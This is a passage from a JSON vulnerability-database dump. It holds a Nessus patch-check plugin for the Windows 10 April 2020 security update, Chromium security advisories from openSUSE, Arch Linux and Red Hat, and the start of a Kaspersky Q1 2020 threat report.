way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)", "edition": 6, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-04-14T00:00:00", "title": "KB4550930: Windows 10 April 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0950", "CVE-2020-1016", "CVE-2020-0967", "CVE-2020-0983", "CVE-2020-0962", "CVE-2020-0687", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0946", "CVE-2020-0948", "CVE-2020-0958", "CVE-2020-0987", "CVE-2020-0784", "CVE-2020-0992", "CVE-2020-1008", "CVE-2020-1094", "CVE-2020-0959", "CVE-2020-0956", "CVE-2020-0949", "CVE-2020-0953", "CVE-2020-0938", "CVE-2020-0952", "CVE-2020-0993", "CVE-2020-0945", "CVE-2020-0988", "CVE-2020-1014", "CVE-2020-0937", "CVE-2020-0985", "CVE-2020-1003", "CVE-2020-1011", "CVE-2020-0821", "CVE-2020-1005", "CVE-2020-0999", "CVE-2020-0995", "CVE-2020-0969", "CVE-2020-0960", "CVE-2020-0964", "CVE-2020-0982", "CVE-2020-1015", "CVE-2020-0955", "CVE-2020-1027", "CVE-2020-1020", "CVE-2020-0889", "CVE-2020-1009", "CVE-2020-0968", "CVE-2020-0966", "CVE-2020-1007", "CVE-2020-0936", "CVE-2020-1004", "CVE-2020-0994", "CVE-2020-0965"], "modified": "2020-04-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550930.NASL", "href": "https://www.tenable.com/plugins/nessus/135469", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135469);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/11/06\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0784\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0937\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0948\",\n \"CVE-2020-0949\",\n \"CVE-2020-0950\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0969\",\n \"CVE-2020-0982\",\n \"CVE-2020-0983\",\n \"CVE-2020-0985\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1003\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1011\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"MSKB\", value:\"4550930\");\n script_xref(name:\"MSFT\", value:\"MS20-4550930\");\n script_xref(name:\"IAVA\", value:\"2020-A-0156-S\");\n\n script_name(english:\"KB4550930: Windows 10 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550930.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0948,\n CVE-2020-0949, CVE-2020-0950)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0937,\n CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Stack fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-0985)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2020-1003)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists when the\n Windows Delivery Optimization service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code\n with elevated system privileges. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0983)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0784)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\n\n - An elevation of privilege vulnerability exists when the\n Windows System Assessment Tool improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows System Assessment Tool\n handles file operations. (CVE-2020-1011)\n \n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-0969)\");\n # https://support.microsoft.com/en-us/help/4550930/windows-10-update-kb4550930\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9b9dba94\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4550930.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0992\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550930');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550930])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2020-02-27T20:32:58", "bulletinFamily": "unix", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to version 80.0.3987.122 (bsc#1164828).\n\n Security issues fixed:\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n - Fixed an integer overflow in ICU (bsc#1164828).\n\n Non-security issues fixed:\n\n - Dropped the sandbox binary as it should not be needed anymore\n (bsc#1163588).\n\n", "edition": 1, "modified": "2020-02-27T18:23:09", "published": "2020-02-27T18:23:09", "id": "OPENSUSE-SU-2020:0259-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00033.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-02-26T20:32:51", "bulletinFamily": "unix", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "This update for chromium fixes the following issues:\n\n Chromium was updated to version 80.0.3987.122 (bsc#1164828).\n\n Security issues fixed:\n\n - CVE-2020-6418: Fixed a type confusion in V8 (bsc#1164828).\n - CVE-2020-6407: Fixed an OOB memory access in streams (bsc#1164828).\n - Fixed an integer overflow in ICU (bsc#1164828).\n\n Non-security issues fixed:\n\n - Dropped the sandbox binary as it should not be needed anymore\n (bsc#1163588).\n\n", "edition": 1, "modified": "2020-02-26T18:11:22", "published": "2020-02-26T18:11:22", "id": "OPENSUSE-SU-2020:0245-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00030.html", "title": "Security update for chromium (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}], "archlinux": [{"lastseen": "2020-09-22T18:36:39", "bulletinFamily": "unix", "cvelist": ["CVE-2020-6407", "CVE-2020-6418"], "description": "Arch Linux Security Advisory ASA-202002-11\n==========================================\n\nSeverity: High\nDate : 2020-02-25\nCVE-ID : CVE-2020-6407 CVE-2020-6418\nPackage : chromium\nType : multiple issues\nRemote : Yes\nLink : https://security.archlinux.org/AVG-1102\n\nSummary\n=======\n\nThe package chromium before version 80.0.3987.122-1 is vulnerable to\nmultiple issues including arbitrary code execution and information\ndisclosure.\n\nResolution\n==========\n\nUpgrade to 80.0.3987.122-1.\n\n# pacman -Syu \"chromium>=80.0.3987.122-1\"\n\nThe problems have been fixed upstream in version 80.0.3987.122.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2020-6407 (information disclosure)\n\nAn out-of-bounds memory access vulnerability has been found in the\nstreams component of chromium before 80.0.3987.122.\n\n- CVE-2020-6418 (arbitrary code execution)\n\nA type confusion vulnerability has been found in the V8 component of\nchromium before 80.0.3987.122.\n\nImpact\n======\n\nA remote attacker can access sensitive information or execute arbitrary\ncode on the affected host.\n\nReferences\n==========\n\nhttps://chromereleases.googleblog.com/2020/02/stable-channel-update-for-desktop_24.html\nhttps://crbug.com/1045931\nhttps://crbug.com/1053604\nhttps://security.archlinux.org/CVE-2020-6407\nhttps://security.archlinux.org/CVE-2020-6418", "modified": "2020-02-25T00:00:00", "published": "2020-02-25T00:00:00", "id": "ASA-202002-11", "href": "https://security.archlinux.org/ASA-202002-11", "type": "archlinux", "title": "[ASA-202002-11] chromium: multiple issues", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2020-03-13T09:36:23", "bulletinFamily": "unix", "cvelist": ["CVE-2020-10531", "CVE-2020-6383", "CVE-2020-6384", "CVE-2020-6386", "CVE-2020-6407", "CVE-2020-6418"], "description": "Chromium is an open-source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 80.0.3987.122.\n\nSecurity Fix(es):\n\n* ICU: Integer overflow in UnicodeString::doAppend() (BZ#1807349)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6383)\n\n* chromium-browser: Use after free in WebAudio (CVE-2020-6384)\n\n* chromium-browser: Use after free in speech (CVE-2020-6386)\n\n* chromium-browser: Out of bounds memory access in streams (CVE-2020-6407)\n\n* chromium-browser: Type confusion in V8 (CVE-2020-6418)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2020-03-13T12:36:42", "published": "2020-03-09T12:03:29", "id": "RHSA-2020:0738", "href": "https://access.redhat.com/errata/RHSA-2020:0738", "type": "redhat", "title": "(RHSA-2020:0738) Important: chromium-browser security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securelist": [{"lastseen": "2020-05-20T11:49:25", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2017-8759", "CVE-2018-0802", "CVE-2019-17026", "CVE-2020-0601", "CVE-2020-0609", "CVE-2020-0610", "CVE-2020-0674", "CVE-2020-0688", "CVE-2020-0729", "CVE-2020-0767", "CVE-2020-0796", "CVE-2020-6418"], "description": "\n\n_These statistics are based on detection verdicts for Kaspersky products received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network,\n\n * Kaspersky solutions blocked 726,536,269 attacks launched from online resources in 203 countries across the globe.\n * A total of 442,039,230 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 249,748 unique users.\n * Ransomware attacks were defeated on the computers of 178,922 unique users.\n * Our File Anti-Virus detected 164,653,290 unique malicious and potentially unwanted objects.\n * Kaspersky products for mobile devices detected: \n * 1,152,662 malicious installation packages\n * 42,115 installation packages for mobile banking trojans\n * 4339 installation packages for mobile ransomware trojans\n\n## Mobile threats\n\n### Quarter events\n\nQ1 2020 will be remembered primarily for the coronavirus pandemic and cybercriminals' exploitation of the topic. In particular, the creators of a new modification of the Ginp banking trojan renamed their malware Coronavirus Finder and then began offering it for \u20ac0.75 disguised as an app supposedly capable of detecting nearby people infected with COVID-19. Thus, the cybercriminals tried not only to scam users by exploiting hot topics, but to gain 